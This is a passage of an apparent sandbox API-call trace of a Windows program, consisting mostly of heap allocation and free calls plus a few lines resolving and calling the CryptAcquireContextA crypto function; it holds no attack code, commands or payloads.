Size=0x10) returned 0x43c9ff8 [0096.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0096.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f38 [0096.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0096.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0096.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0096.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0096.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0096.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0096.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0096.652] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0096.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0096.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0096.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0096.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0096.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0096.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0096.652] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0096.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0096.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0096.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0096.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0096.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0096.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0096.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0096.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0096.653] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0096.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0096.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0096.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0096.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0096.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0096.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0096.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0096.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0096.653] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0096.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0096.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0096.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fb0 [0096.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0096.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0096.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0096.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0096.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0096.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0096.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0096.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0096.654] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0096.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0096.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ef0 [0096.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0096.654] PeekMessageW (in: lpMsg=0x144ea34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea34) returned 0 [0096.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0096.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0096.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0096.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0096.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0096.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0096.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0096.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0096.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0096.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0096.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0096.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0096.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0096.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0096.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0096.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0096.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0096.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0096.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0096.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0096.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0096.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0096.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0096.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0096.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0096.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0096.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0096.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0096.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0096.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0096.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0096.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0096.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0096.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0096.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0096.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0096.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0096.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0096.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0096.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0096.657] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0096.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0096.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0096.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0096.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0096.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0096.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0096.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0096.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0096.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0096.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0096.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0096.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0096.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0096.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0096.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0096.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0096.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0096.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0096.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0096.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0096.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0096.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0096.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0096.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0096.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0096.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0096.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0096.659] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0096.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0096.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0096.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796d88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0096.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0096.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0096.659] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0096.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0096.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0096.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0096.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0096.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0096.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0096.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0096.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0096.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0096.660] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5360) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0096.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0096.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0096.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0096.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.663] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0096.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0096.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0096.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0096.663] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0096.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0096.663] 